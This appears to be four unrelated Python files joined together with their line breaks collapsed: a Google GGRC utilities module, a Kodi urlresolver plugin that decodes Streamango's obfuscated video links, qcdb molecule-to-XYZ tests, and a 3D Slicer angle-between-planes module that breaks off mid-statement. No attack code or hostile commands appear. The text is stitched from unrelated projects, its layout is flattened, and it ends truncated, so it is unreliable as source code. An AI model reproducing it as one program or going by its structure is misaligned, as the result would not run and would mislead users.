# Copyright (C) 2016 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> import datetime import json import re import sqlalchemy import sys from flask import request from ggrc.settings import CUSTOM_URL_ROOT from ggrc.utils import benchmarks class GrcEncoder(json.JSONEncoder): """Custom JSON Encoder to handle datetime objects and sets from: `http://stackoverflow.com/questions/12122007/python-json-encoder-to-support-datetime`_ also consider: `http://hg.tryton.org/2.4/trytond/file/ade5432ac476/trytond/protocols/jsonrpc.py#l53`_ """ def default(self, obj): if isinstance(obj, datetime.datetime): return obj.isoformat() elif isinstance(obj, datetime.date): return obj.isoformat() elif isinstance(obj, datetime.timedelta): return (datetime.datetime.min + obj).time().isoformat() elif isinstance(obj, set): return list(obj) else: return super(GrcEncoder, self).default(obj) def as_json(obj, **kwargs): return json.dumps(obj, cls=GrcEncoder, **kwargs) def service_for(obj): module = sys.modules['ggrc.services'] if type(obj) is str or type(obj) is unicode: # noqa model_type = obj else: model_type = obj.__class__.__name__ return getattr(module, model_type, None) def url_for(obj, id=None): service = service_for(obj) if service is None: return None if not hasattr(service, 'url_for'): return None if id is not None: return service.url_for(id=id) return service.url_for(obj) def view_service_for(obj): module = sys.modules['ggrc.views'] if type(obj) is str or type(obj) is unicode: # noqa model_type = obj else: model_type = obj.__class__.__name__ return getattr(module, model_type, None) def view_url_for(obj, id=None): service = view_service_for(obj) if service is None: return None if not hasattr(service, 'url_for'): return None if id is not None: return service.url_for(id=id) return service.url_for(obj) def encoded_dict(in_dict): # http://stackoverflow.com/questions/6480723/urllib-urlencode-doesn't-like-unicode-values-how-about-this-workaround out_dict = {} for k, v in in_dict.iteritems(): if isinstance(v, unicode): # noqa v = v.encode('utf8') elif isinstance(v, str): # Must be encoded in UTF-8 v.decode('utf8') out_dict[k] = v return out_dict def merge_dict(destination, source, path=None): """merges source into destination""" if path is None: path = [] for key in source: if key in destination: if isinstance(destination[key], dict) and isinstance(source[key], dict): merge_dict(destination[key], source[key], path + [str(key)]) elif destination[key] == source[key]: pass # same leaf value else: raise Exception('Conflict at %s' % '.'.join(path + [str(key)])) else: destination[key] = source[key] return destination def merge_dicts(*args): result = {} for arg in args: result = merge_dict(result, arg) return result def get_url_root(): if CUSTOM_URL_ROOT is not None: return CUSTOM_URL_ROOT return request.url_root def get_mapping_rules(): """ Get mappings rules as defined in business_object.js Special cases: Aduit has direct mapping to Program with program_id Request has a direct mapping to Audit with audit_id Section has a direct mapping to Standard/Regulation/Poicy with directive_id Anything can be mapped to a request, frotent show audit insted """ def filter(object_list): """ remove all lower case items since real object are CamelCase """ return set([item for item in object_list if item != item.lower()]) # these rules are copy pasted from # src/ggrc/assets/javascripts/apps/base_widgets.js line: 9 # WARNING ######################################################## # Manually added Risks and threats to the list from base_widgets # ################################################################## # TODO: Read these rules from different modules and combine them here. business_object_rules = { "AccessGroup": "Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Audit": "AccessGroup Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor", # noqa # "AssessmentTemplate": "Audit", # Uncomment this line when we add support for assessment templates in exports # noqa "Clause": "AccessGroup Audit Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Contract": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Control": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Assessment": "AccessGroup Audit Clause Contract Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "DataAsset": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Facility": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Issue": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Market": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Objective": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "OrgGroup": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Person": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Policy": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Process": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Product": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Program": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Project": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Regulation": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Request": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Section": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Standard": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "System": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Vendor": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa "Risk": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Threat CycleTaskGroupObjectTask", # noqa "Threat": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk CycleTaskGroupObjectTask", # noqa "CycleTaskGroupObjectTask": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat", # noqa } split_rules = {k: v.split() for k, v in business_object_rules.items()} filtered_rules = {k: filter(v) for k, v in split_rules.items()} return filtered_rules def _prefix_camelcase(name, prefix): name = name[:1].lower() + name[1:] return re.sub(r'[A-Z]', lambda pat: prefix + pat.group(0).lower(), name) def underscore_from_camelcase(name): return _prefix_camelcase(name, "_") def title_from_camelcase(name): return _prefix_camelcase(name, " ") def get_fuzzy_date(delta_date): """Get a human readable date string. This function returns a human friendly time delta compared to today. Args: delta_date (date): Date that we want to show to the user. Returns: string: A human readable representation date delta. Examples: >>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(2)) 'in 2 days' >>> get_fuzzy_date(datetime.date.today()) 'today' >>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(-1)) '1 day ago' """ if not delta_date: return "" if isinstance(delta_date, datetime.datetime): delta_date = delta_date.date() delta = delta_date - datetime.date.today() if delta.days < 0: days = abs(delta.days) return "{} day{} ago".format(days, "s" if days > 1 else "") if delta.days == 0: return "today" # TODO: use format_timedelta from babel package. return "in {} day{}".format(delta.days, "s" if delta.days > 1 else "") # pylint: disable=too-few-public-methods # because this is a small context manager class QueryCounter(object): """Context manager for counting sqlalchemy database queries. Usage: with QueryCounter() as counter: query_count = counter.get """ def __init__(self): self.queries = [] def after_cursor_execute(*args): self.queries.append(args[2]) self.listener = after_cursor_execute def __enter__(self): sqlalchemy.event.listen(sqlalchemy.engine.Engine, "after_cursor_execute", self.listener) return self def __exit__(self, *_): sqlalchemy.event.remove(sqlalchemy.engine.Engine, "after_cursor_execute", self.listener) @property def get(self): return len(self.queries) benchmark = benchmarks.get_benchmark() with_nop = benchmarks.WithNop
""" urlresolver Kodi Addon This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import re from lib import helpers from urlresolver import common from urlresolver.resolver import UrlResolver, ResolverError class StreamangoResolver(UrlResolver): name = "streamango" domains = ['streamango.com', "streamcherry.com"] pattern = '(?://|\.)(stream(?:ango|cherry)\.com)/(?:v/d|f|embed)/([0-9a-zA-Z]+)' def __init__(self): self.net = common.Net() def get_media_url(self, host, media_id): web_url = self.get_url(host, media_id) headers = {'User-Agent': common.RAND_UA} html = self.net.http_GET(web_url, headers=headers).content if html: encoded = re.search('''srces\.push\({type:"video/mp4",src:\w+\('([^']+)',(\d+)''', html) if encoded: source = self.decode(encoded.group(1), int(encoded.group(2))) if source: source = "http:%s" % source if source.startswith("//") else source source = source.split("/") if not source[-1].isdigit(): source[-1] = re.sub('[^\d]', '', source[-1]) source = "/".join(source) headers.update({'Referer': web_url}) return source + helpers.append_headers(headers) raise ResolverError("Unable to locate video") def decode(self, encoded, code): _0x59b81a = "" k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=' k = k[::-1] count = 0 for index in range(0, len(encoded) - 1): while count <= len(encoded) - 1: _0x4a2f3a = k.index(encoded[count]) count += 1 _0x29d5bf = k.index(encoded[count]) count += 1 _0x3b6833 = k.index(encoded[count]) count += 1 _0x426d70 = k.index(encoded[count]) count += 1 _0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4)) _0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2)) _0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70 _0x2e4782 = _0x2e4782 ^ code _0x59b81a = str(_0x59b81a) + chr(_0x2e4782) if _0x3b6833 != 64: _0x59b81a = str(_0x59b81a) + chr(_0x2c0540) if _0x3b6833 != 64: _0x59b81a = str(_0x59b81a) + chr(_0x5a46ef) return _0x59b81a def get_url(self, host, media_id): return self._default_get_url(host, media_id, 'http://{host}/embed/{media_id}')
import sys import pytest from utils import * from addons import * subject1 = """ 3 au Co 0 0 0 H 2 0 0 h_OTher -2 0 0 """ ans1_au = """3 au CoH2 Co 0.000000000000 0.000000000000 0.000000000000 H 2.000000000000 0.000000000000 0.000000000000 H -2.000000000000 -0.000000000000 0.000000000000 """ ans1_ang = """3 CoH2 Co 0.000000000000 0.000000000000 0.000000000000 H 1.058354421340 0.000000000000 0.000000000000 H -1.058354421340 -0.000000000000 0.000000000000 """ ans1c_ang = """3 CoH2 59Co 0.00000000 0.00000000 0.00000000 1H 1.05835442 0.00000000 0.00000000 1H_other -1.05835442 -0.00000000 0.00000000 """ #subject2 = """ #Co 0 0 0 #units au #no_reorient #-- #@H 2 0 0 #h_OTher -2 0 0 #""" # #ans2_au = """3 au # #Co 0.000000000000 0.000000000000 0.000000000000 #@H 2.000000000000 0.000000000000 0.000000000000 #H -2.000000000000 0.000000000000 0.000000000000""" # #ans2_ang = """3 # #Co 0.000000000000 0.000000000000 0.000000000000 #Gh(1) 1.058354417180 0.000000000000 0.000000000000 #H -1.058354417180 0.000000000000 0.000000000000""" # #ans2c_ang = """2 # #Co 0.000000000000 0.000000000000 0.000000000000 #H -1.058354417180 0.000000000000 0.000000000000""" subject2 = """ Co 0 0 0 no_reorient -- @H 1.05835442134 0 0 h_OTher -1.05835442134 0 0 """ ans2_au = """3 au CoH2 Co 0.000000000000 0.000000000000 0.000000000000 @H 2.000000000000 0.000000000000 0.000000000000 H -2.000000000000 0.000000000000 0.000000000000 """ ans2_ang = """3 CoH2 Co 0.000000000000 0.000000000000 0.000000000000 Gh(1) 1.058354421340 0.000000000000 0.000000000000 H -1.058354421340 0.000000000000 0.000000000000 """ ans2c_ang = """2 CoH2 Co 0.000000000000 0.000000000000 0.000000000000 H -1.058354421340 0.000000000000 0.000000000000 """ def test_toxyz_1a(): subject = subject1 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', units='Bohr') assert compare_strings(ans1_au, xyz, sys._getframe().f_code.co_name) def test_toxyz_1b(): subject = subject1 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', units='Angstrom') assert compare_strings(ans1_ang, xyz, sys._getframe().f_code.co_name) def test_toxyz_1c(): subject = subject1 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', prec=8, atom_format='{elea}{elem}{elbl}') print(xyz) assert compare_strings(ans1c_ang, xyz, sys._getframe().f_code.co_name) #def test_toxyz_2a(): # subject = subject2 # mol = qcdb.Molecule(subject) # # xyz = mol.to_string(dtype='xyz', units='Bohr') # # assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name) # #def test_toxyz_2b(): # subject = subject2 # mol = qcdb.Molecule(subject) # # xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='Gh({elez})') # # assert compare_strings(ans2_ang, xyz, sys._getframe().f_code.co_name) # #def test_toxyz_2c(): # subject = subject2 # mol = qcdb.Molecule(subject) # # xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='') # # assert compare_strings(ans2c_ang, xyz, sys._getframe().f_code.co_name) def test_toxyz_2a(): subject = subject2 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', units='Bohr') assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name) def test_toxyz_2b(): subject = subject2 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='Gh({elez})') assert compare_strings(ans2_ang, xyz, sys._getframe().f_code.co_name) def test_toxyz_2c(): subject = subject2 mol = qcdb.Molecule(subject) xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='') assert compare_strings(ans2c_ang, xyz, sys._getframe().f_code.co_name) @using_psi4_molrec def test_toxyz_3a(): import psi4 subject = subject2 mol = psi4.core.Molecule.from_string(subject) xyz = mol.to_string(dtype='xyz', units='Bohr') assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
from __main__ import vtk, qt, ctk, slicer import numpy from math import * from slicer.ScriptedLoadableModule import * import os import pickle import time from sys import maxint MAXINT = maxint from slicer.util import VTKObservationMixin class ModelAddedClass(VTKObservationMixin): def __init__(self, anglePlanes): VTKObservationMixin.__init__(self) self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeAddedEvent, self.nodeAddedCallback) self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeRemovedEvent, self.nodeRemovedCallback) self.anglePlanes = anglePlanes @vtk.calldata_type(vtk.VTK_OBJECT) def nodeAddedCallback(self, caller, eventId, callData): if isinstance(callData, slicer.vtkMRMLModelNode): self.addObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified) @vtk.calldata_type(vtk.VTK_OBJECT) def nodeRemovedCallback(self, caller, eventId, callData): if isinstance(callData, slicer.vtkMRMLModelNode): self.removeObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified) self.anglePlanes.removeModelPointLocator(callData.GetName()) def onModelNodePolyDataModified(self, caller, eventId): self.anglePlanes.addModelPointLocator(caller.GetName(), caller.GetPolyData()) class AnglePlanes(ScriptedLoadableModule): def __init__(self, parent): ScriptedLoadableModule.__init__(self, parent) parent.title = "Angle Planes" parent.categories = ["Shape Analysis"] parent.dependencies = [] parent.contributors = ["Julia Lopinto", "Juan Carlos Prieto"] parent.helpText = """ This Module is used to calculate the angle between two planes by using the normals. The user gets the choice to use two planes which are already implemented on Slicer or they can define a plane by using landmarks (at least 3 landmarks). Plane can also be saved to be reused for other models. This is an alpha version of the module. It can't be used for the moment. """ parent.acknowledgementText = """ This work was supported by the National Institutes of Dental and Craniofacial Research and Biomedical Imaging and Bioengineering of the National Institutes of Health under Award Number R01DE024450. """ self.parent = parent class AnglePlanesWidget(ScriptedLoadableModuleWidget): def setup(self): ScriptedLoadableModuleWidget.setup(self) self.moduleName = "AnglePlanes" self.i = 0 self.logic = AnglePlanesLogic() self.planeControlsId = 0 self.planeControlsDictionary = {} self.midPointFiducialDictionaryID = {} # self.logic.initializePlane() self.n_vector = numpy.matrix([[0], [0], [1], [1]]) self.interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton") #Definition of the 2 planes # Collapsible button -- Scene Description self.loadCollapsibleButton = ctk.ctkCollapsibleButton() self.loadCollapsibleButton.text = "Scene" self.layout.addWidget(self.loadCollapsibleButton) # Layout within the laplace collapsible button self.loadFormLayout = qt.QFormLayout(self.loadCollapsibleButton) #--------------------------- List of Models --------------------------# treeView = slicer.qMRMLTreeView() treeView.setMRMLScene(slicer.app.mrmlScene()) treeView.setSceneModelType('Displayable') treeView.sceneModel().setHorizontalHeaderLabels(["Models"]) treeView.sortFilterProxyModel().nodeTypes = ['vtkMRMLModelNode'] header = treeView.header() header.setResizeMode(0, qt.QHeaderView.Stretch) header.setVisible(True) self.loadFormLayout.addWidget(treeView) # numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode") # for i in range (3,numNodes): # self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" ) # print self.elements.GetName() # Add vertical spacer self.layout.addStretch(1) #------------------------ Compute Bounding Box ----------------------# buttonFrameBox = qt.QFrame(self.parent) buttonFrameBox.setLayout(qt.QHBoxLayout()) self.loadFormLayout.addWidget(buttonFrameBox) self.computeBox = qt.QPushButton("Compute Bounding Box around all models") buttonFrameBox.layout().addWidget(self.computeBox) self.computeBox.connect('clicked()', self.onComputeBox) self.CollapsibleButton = ctk.ctkCollapsibleButton() self.CollapsibleButton.text = "Manage planes" self.layout.addWidget(self.CollapsibleButton) self.managePlanesFormLayout = qt.QFormLayout(self.CollapsibleButton) self.CollapsibleButton.checked = True # Add planes and manage landmark addition to each plane addNewPlaneLayout = qt.QHBoxLayout() addPlaneLabel = qt.QLabel('Add new plane') addPlaneButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ") addPlaneButton.setFixedSize(50,25) addPlaneButton.connect('clicked()', self.addNewPlane) addPlaneButton.setEnabled(True) addNewPlaneLayout.addWidget(addPlaneLabel) addNewPlaneLayout.addWidget(addPlaneButton) self.managePlanesFormLayout.addRow(addNewPlaneLayout) # ----------------- Compute Mid Point ------------- self.midPointGroupBox = ctk.ctkCollapsibleButton() self.midPointGroupBox.setText('Define middle point between two landmarks') self.midPointGroupBox.collapsed = True self.parent.layout().addWidget(self.midPointGroupBox) self.landmarkComboBox1MidPoint = qt.QComboBox() self.landmarkComboBox2MidPoint = qt.QComboBox() landmark1Layout = qt.QFormLayout() landmark1Layout.addRow('Landmark A: ', self.landmarkComboBox1MidPoint) landmark1Layout.addRow('Landmark B: ', self.landmarkComboBox2MidPoint) self.defineMiddlePointButton = qt.QPushButton(' Add middle point ') # self.midPointOnSurfaceCheckBox = qt.QCheckBox('On Surface') # self.midPointOnSurfaceCheckBox.setChecked(False) exportLayout_1 = qt.QFormLayout() # exportLayout_1.addRow(self.midPointOnSurfaceCheckBox, self.defineMiddlePointButton) exportLayout_1.addRow(self.defineMiddlePointButton) self.midPointLayout = qt.QVBoxLayout() self.midPointLayout.addLayout(landmark1Layout) self.midPointLayout.addLayout(exportLayout_1) self.midPointGroupBox.setLayout(self.midPointLayout) self.defineMiddlePointButton.connect('clicked()', self.onAddMidPoint) # self.landmarkComboBox1MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint) # self.landmarkComboBox2MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint) # -------- Calculate angles between planes ------------ self.CollapsibleButtonPlane = ctk.ctkCollapsibleButton() self.CollapsibleButtonPlane.text = "Choose planes" self.layout.addWidget(self.CollapsibleButtonPlane) sampleFormLayoutPlane = qt.QFormLayout(self.CollapsibleButtonPlane) self.planeComboBox1 = qt.QComboBox() self.planeComboBox1.addItem("red") self.planeComboBox1.addItem("yellow") self.planeComboBox1.addItem("green") sampleFormLayoutPlane.addRow("Select plane 1: ", self.planeComboBox1) self.planeComboBox2 = qt.QComboBox() self.planeComboBox2.addItem("red") self.planeComboBox2.addItem("yellow") self.planeComboBox2.addItem("green") sampleFormLayoutPlane.addRow("Select plane 2: ", self.planeComboBox2) self.CollapsibleButton2 = ctk.ctkCollapsibleButton() self.CollapsibleButton2.text = "Results" self.layout.addWidget(self.CollapsibleButton2) sampleFormLayout2 = qt.QFormLayout(self.CollapsibleButton2) self.results = qt.QPushButton("Results") self.results.connect('clicked()', self.angleValue) sampleFormLayout2.addWidget(self.results) label_RL = qt.QLabel("R-L View") self.getAngle_RL = qt.QLabel("0") label_SI = qt.QLabel("S-I View") self.getAngle_SI = qt.QLabel("0") label_AP = qt.QLabel("A-P View") self.getAngle_AP = qt.QLabel("0") self.getAngle_RL_comp = qt.QLabel("0") self.getAngle_SI_comp = qt.QLabel("0") self.getAngle_AP_comp = qt.QLabel("0") tableResult = qt.QTableWidget(3, 3) tableResult.setColumnCount(3) tableResult.setHorizontalHeaderLabels([' View ', 'Angle', 'Complementary angle']) tableResult.setColumnWidth(0, 80) tableResult.setColumnWidth(1, 80) tableResult.setColumnWidth(2, 180) tableResult.setRowCount(1) tableResult.setCellWidget(0, 0, label_RL) tableResult.setCellWidget(0, 1, self.getAngle_RL) tableResult.setCellWidget(0, 2, self.getAngle_RL_comp) tableResult.setRowCount(2) tableResult.setCellWidget(1, 0, label_SI) tableResult.setCellWidget(1, 1, self.getAngle_SI) tableResult.setCellWidget(1, 2, self.getAngle_SI_comp) tableResult.setRowCount(3) tableResult.setCellWidget(2, 0, label_AP) tableResult.setCellWidget(2, 1, self.getAngle_AP) tableResult.setCellWidget(2, 2, self.getAngle_AP_comp) # Add vertical spacer self.layout.addStretch(1) sampleFormLayout2.addWidget(tableResult) self.CollapsibleButton3 = ctk.ctkCollapsibleButton() self.CollapsibleButton3.text = "Save" self.layout.addWidget(self.CollapsibleButton3) sampleFormLayout3 = qt.QFormLayout(self.CollapsibleButton3) self.CollapsibleButton3.checked = False buttonFrame = qt.QFrame(self.parent) buttonFrame.setLayout(qt.QVBoxLayout()) sampleFormLayout3.addWidget(buttonFrame) #-------------------------------- PLANES --------------------------------# save_plane = qt.QLabel("Save the planes you create as a txt file.") buttonFrame.layout().addWidget(save_plane) save = qt.QPushButton("Save plane") buttonFrame.layout().addWidget(save) # load_plane = qt.QLabel("Load the file with the plane you saved.") # buttonFrame.layout().addWidget(load_plane) read = qt.QPushButton("Load plane") buttonFrame.layout().addWidget(read) #-------------------------------- CONNECTIONS --------------------------------# self.planeComboBox1.connect('currentIndexChanged(QString)', self.valueComboBox) self.planeComboBox2.connect('currentIndexChanged(QString)', self.valueComboBox) save.connect('clicked(bool)', self.onSavePlanes) read.connect('clicked(bool)', self.onReadPlanes) slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene) self.pointLocatorDictionary = {} numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode") for i in range (3, numNodes): modelnode = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" ) self.addModelPointLocator(modelnode.GetName(), modelnode.GetPolyData()) ModelAddedClass(self) def removeModelPointLocator(self, name): if name in self.pointLocatorDictionary: print("Removing point locator {0}".format(name)) del self.pointLocatorDictionary[name] def addModelPointLocator(self, name, polydata): if not name in self.pointLocatorDictionary: print "Adding point locator: {0}".format(name) pointLocator = vtk.vtkPointLocator() pointLocator.SetDataSet(polydata) pointLocator.AutomaticOn() pointLocator.BuildLocator() self.pointLocatorDictionary[name] = pointLocator def addNewPlane(self, keyLoad = -1): if keyLoad != -1: self.planeControlsId = keyLoad else: self.planeControlsId += 1 planeControls = AnglePlanesWidgetPlaneControl(self, self.planeControlsId, self.pointLocatorDictionary) self.managePlanesFormLayout.addRow(planeControls) key = "Plane " + str(self.planeControlsId) self.planeControlsDictionary[key] = planeControls self.planeComboBox1.addItem(key) self.planeComboBox2.addItem(key) def onComputeBox(self): numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode") bound = [MAXINT, -MAXINT, MAXINT, -MAXINT, MAXINT, -MAXINT] for i in range (3,numNodes): self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" ) node = slicer.util.getNode(self.elements.GetName()) polydata = node.GetPolyData() tempbound = polydata.GetBounds() bound[0] = min(bound[0], tempbound[0]) bound[2] = min(bound[2], tempbound[2]) bound[4] = min(bound[4], tempbound[4]) bound[1] = max(bound[1], tempbound[1]) bound[3] = max(bound[3], tempbound[3]) bound[5] = max(bound[5], tempbound[5]) #--------------------------- Box around the model --------------------------# # print "bound", bound dimX = bound[1]-bound[0] dimY = bound[3]-bound[2] dimZ = bound[5]-bound[4] # print "dimension X :", dimX # print "dimension Y :", dimY # print "dimension Z :", dimZ dimX = dimX + 10 dimY = dimY + 10 dimZ = dimZ + 10 sampleVolumeNode = slicer.vtkMRMLScalarVolumeNode() sampleVolumeNode = slicer.mrmlScene.AddNode(sampleVolumeNode) imageData = vtk.vtkImageData() # Do NOT set the spacing and the origin of imageData (vtkImageData) # The spacing and the origin should only be set in the vtkMRMLScalarVolumeNode!!!!!! imageData.SetDimensions(int(dimX), int(dimY), int(dimZ)) imageData.AllocateScalars(vtk.VTK_UNSIGNED_CHAR, 1) extent = imageData.GetExtent() for x in xrange(extent[0], extent[1]+1): for y in xrange(extent[2], extent[3]+1): for z in xrange(extent[4], extent[5]+1): imageData.SetScalarComponentFromDouble(x,y,z,0,0) sampleVolumeNode.SetSpacing(1, 1, 1) sampleVolumeNode.SetOrigin(bound[0], bound[2], bound[4]) sampleVolumeNode.SetName("Empty_volume") sampleVolumeNode.SetAndObserveImageData(imageData) sampleVolumeNode.SetLabelMap(1) labelmapVolumeDisplayNode = slicer.vtkMRMLLabelMapVolumeDisplayNode() slicer.mrmlScene.AddNode(labelmapVolumeDisplayNode) colorNode = slicer.util.getNode('GenericAnatomyColors') labelmapVolumeDisplayNode.SetAndObserveColorNodeID(colorNode.GetID()) labelmapVolumeDisplayNode.VisibilityOn() sampleVolumeNode.SetAndObserveDisplayNodeID(labelmapVolumeDisplayNode.GetID()) count = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLSliceCompositeNode') for n in xrange(count): compNode = slicer.mrmlScene.GetNthNodeByClass(n, 'vtkMRMLSliceCompositeNode') compNode.SetBackgroundVolumeID(sampleVolumeNode.GetID()) def onAddMidPoint(self): f1 = self.landmarkComboBox1MidPoint.currentText f2 = self.landmarkComboBox2MidPoint.currentText p1 = f1[0:f1.find("-")] print p1 fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p1).GetItemAsObject(0) index1 = fidlist1.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f1]) coord1 = numpy.zeros(3) fidlist1.GetNthFiducialPosition(index1, coord1) p2 = f2[0:f2.find("-")] print p2 fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p2).GetItemAsObject(0) index2 = fidlist2.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f2]) coord2 = numpy.zeros(3) fidlist2.GetNthFiducialPosition(index2, coord2) coord = coord1 + coord2 coord /= 2 fidlist1.AddFiducial(coord[0], coord[1], coord[2]) if p1 != p2: fidlist2.AddFiducial(coord[0], coord[1], coord[2]) fidlist2.SetNthFiducialVisibility(fidlist2.GetNumberOfFiducials() - 1, False) def onFiducialAddedMidPoint(self, obj, event): fidlist = obj label = 